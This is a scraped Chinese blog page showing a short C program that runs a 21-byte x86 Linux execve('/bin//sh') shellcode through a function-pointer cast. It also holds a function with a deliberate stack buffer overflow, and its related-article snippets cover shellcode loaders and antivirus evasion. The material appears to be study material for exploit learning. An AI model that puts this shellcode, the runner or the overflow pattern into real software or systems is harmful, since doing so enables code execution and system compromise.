(*(void(*)())&shellcode)();

最新推荐文章于 2023-12-13 13:46:09 发布
最新推荐文章于 2023-12-13 13:46:09 发布
阅读量278 收藏
点赞数 1
分类专栏: C语言数据结构 文章标签: 缓冲区溢出 shellcode 系统调用 内存安全 C语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34071268/article/details/125857222
版权 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char shellcode[100]= "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

void vulnerable_function()
{
    char buf[128];
    read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv)
{
    (*(void(*)())&shellcode)();
//    vulnerable_function();
//    write(STDOUT_FILENO, "Hello, World\n", 13);
}
Stupid_Gao
关注
专栏目录
手戳shellcode编写 第一课(动态函数地址调用函数)
啊渊的专栏
08-21 166
在程序免杀中,我们通常不会直接通过函数名称方式来调用函数,一般都是通过执行shellcode来执行我们需要的代码。如果直接将exe文件解析出来的shellcode会发现这些shellcode不能直接运行,因为函数地址调用的问题。因此我们需要动态获取函数地址来调用shellcode。为了了解shellcode的基础,我们先使用c++源码方式来学习,如果动态的获取函数地址,然后再使用汇编编写以下功能实现shellcode的完成编写。
java 加载shellcode_通用Shellcode加载器
weixin_35780426的博客
02-26 958
Shellcode加载器是一种基本的规避技术。尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。例如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。我们将研究一些适合与加载器结合使用的后期开发框架,并研究如何嵌入其他类型的二进制文件(例如.NET和已编译的PE二进制文件)。博客系列的第一部分将介...
演示几种用c语言来执行shellcode(其实也就是机器码)的方式,shellcode(示例代码)
weixin_36200896的博客
05-24 845
简介这篇文章主要介绍了shellcode(示例代码)以及相关的经验技巧,文章约1446字,浏览量241,点赞数8,值得推荐!/** 作者: 冷却* 时间: 2009年2月21日* E-mail: leng_que@yahoo.com.cn* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windo...
(*(void (*) () )shellcode) ();的含义
Yannie's Blog
12-07 1029
我们在写执行shellcode的语句的时候,可以直接写成这样的一行 ( * (void ( * ) () )shellcode) () 那这一行又是什么意思呢? 我们来从简单的开始: typedef void (*Fun) (void)是什么意思呢? 这里我们就需要了解:typedef有一个用法,可以用来定义函数指针 此处 Fun 是指向这样一个函数的指针,该函数的返回值为void类型,函数没有参...
shellcode编写
qq_39153421的博客
08-02 1117
1.前言漏洞利用最重要的就是shellcode的编写,漏洞发现者在漏洞发现之初并不会给出完整的shellcode,所以我们要学会自己编写shellcode。注:shellcode中不能出现NULL和/x00,存在其一再利用的时候会被截断。 2.什么是Shellcode shellcode是用作利用软件漏洞的有效载荷的一小段代码,因为它通常启动一个命令shell,攻击...
shellcode
DoasIsay的博客
09-15 742
写过shellcode的都写过这样的语句,unsigned char shellcode[]={};  ((void (*)())(&shellcode))(); 然而输出shellcode,&shellcode, &shellcode[0]它们的值却是一样的,但在这里为什么却只能用&shellcode? 如果将它们自身的值各自增一再输出你就会看到不同的结果,这是为什么? 现以window
一个简单用来生成shellcode的类
azraelxuemo的博客
01-26 192
前几天在生成shellcode的时候用的硬编码,后来自己写了个类,可以用来接收一些地址什么的动态生成 class SHELLCODE { public: int size; int now_point; BYTE* shellcode; SHELLCODE(int size); void append(BYTE payload); void append(WORD payload); void append(DWORD payload); void push(LONG payload);
[HACK学习呀] - 2020-02-08 干货 - Shellcode免杀总结<一>1
08-03
Shellcode免杀总结<一> Shellcode免杀是指在anti-virus软件和入侵检测系统中规避检测的技术。本文将Shellcode免杀技巧分为“分离”和“混淆”两个大类,并针对不同检测方式进行讲解。 一、分离免杀 Shellcode...
shellcode样本—弹出MessageBox
谈成(C/C++)
04-26 930
shellcode是一段可独立运行的汇编代码,常出现在漏洞利用中。当我们利用漏洞控制了eip后,就需要shellcode来执行我们想要做的任何事。 shellcode用到的api都是通过动态加载而来的,可以通过fs:[30h]找到PEB中的Ldr结构。在Ldr中记录有dll加载链,从而找到Kernel32。然后通过LoadLibraryA加载任何你想要加载的dll模块。 所有API均通过dll中的EAT导出表查询获得。以下面就是一个用来生成弹出MessageBox的shellcode样本,可以用来测试漏洞利
shellcode基础-Linux木马构造流程
weixin_43988746的博客
12-13 976
编写Linux木马流程
linux c语言shellcode,shellcode编写
weixin_36287955的博客
05-12 816
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?​ shellcode可以用于在栈溢出或者堆溢出的漏洞中用于跳转后执行的代码。本文的代码是在ubuntu 18.04 64位的linux操作系统。​ 首先是一个用于执行shellcode的c语言程序:123456char shellcode[] = "";int (int argc, char...
shellcode学习
weixin_52878095的博客
03-12 4840
一道题目 最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ,这道题目需要我们自己编写 shellcode ,以前 shellcode 都是从 pwntools 或者是msf里面直接生成的,所以借此机会来学习一下 shellcode 的编写 我们先检查一下附件的保护机制 ,啥保护也没开,所以我们可以直接在栈上面构造shellcode然后执行 丢到IDA里面看一下,这里变量s的栈空间只有.0x20大小,而fgets函数可以读入50即0x32,所以存在栈溢出 我们看一下 pwntool
对抗无落地的shellcode注入
hongduilanjun的博客
07-21 1821
一般的shellcode加载到内存都是通过和来获取函数进行shellcode加载,亦或是通过远程申请一块空间来放入shellcode的地址进行加载。为了隐蔽,攻击者通常会通过PEB找到链表,自己去定位函数从而规避杀软对导入表的监控。攻击者先把shellcode加密,在写入时解密存放到内存空间,使用基于文件检测的方法,是无能为力的,那么这种无落地的方式,最终都会在内存中一览无余。...
ShellCode原理以及编写
qq_18811919的博客
07-02 2936
0x0 ShellCode编写注意事原理 1)不能使用字符串的直接偏移 即使你在C/C++代码中定义一个全局变量,一个取值为“Hello world”的字符串,或直接把该字符串作为参数传递给某个函数。但是,编译器会把字符串放置在一个特定的Section中(如.rdata或.data)。 2)不能确定函数的地址(如printf) 在shellcode中,我们却不能以逸待劳了。因为我们无法确定包含所需函数的DLL文件是否已经加载到内存。受ASLR(地址空间布局随机化)机制的影响,系统不会每次都把DLL文件加载
shellCode 公式
网瘾少年丶的博客
05-26 522
E8 E9后的地址公式如下: X = 真正要跳转的地址 - E8这一条指令的下一行指令 等价于 X = 真正要跳转的地址 - (eip + 5) E8 X E9 X BYTE ShellCode[]={0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0xE8,0x00,0x00,0x00,0x00,0xE9,0x00,0x00,0x00,0x0...
执行shellcode的几种方式
qq_41683305的博客
02-24 4904
首先写出汇编成功弹出计算器 #pragma comment(linker,"/section:.data,RWE") //data段可读写 #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //不显示窗口 #pragma comment(linker,"/INCREMENTAL:NO") //指...
c语言调用机器码,演示几种用C语言来执行shellcode(其实也就是机器码)的方式
weixin_36415206的博客
05-20 1063
/** 作者: 冷却* 时间: 2009年2月21日* E-mail: leng_que@yahoo.com.cn* 描述: 演示几种用C语言来执行shellcode(其实也就是机器码)的方式* 备注:在WindowsXP SP3下测试成功*///一段打开Windows计算器(calc.exe)的shellcodeunsigned char shellcode[] ="/xb8/x82/...
shellcode免杀思路
u013367305的博客
05-04 1540
shellcode免杀思路 使用msfconsole生产的shellcode之后正常写入到程序的内存里面的话会直接被杀毒软件静态查杀就能杀掉。 如果我们直接把shellcode贴入到自己程序中的话,编译出来的exe文件就会带上这段byte,而杀毒软件对此非常敏感所以会直接被杀掉。 // An highlighted block unsigned char sendBuf[355] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x5
Shellcode加载器源代码
最新发布
09-12
void (*func)() = (void(*)())exec_mem; // 调用执行 func(); return 0; } ``` 请注意,这个示例使用了Windows平台的API,并且是用C语言编写的。在实际应用中,shellcode加载器的实现可能会涉及更为复杂的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值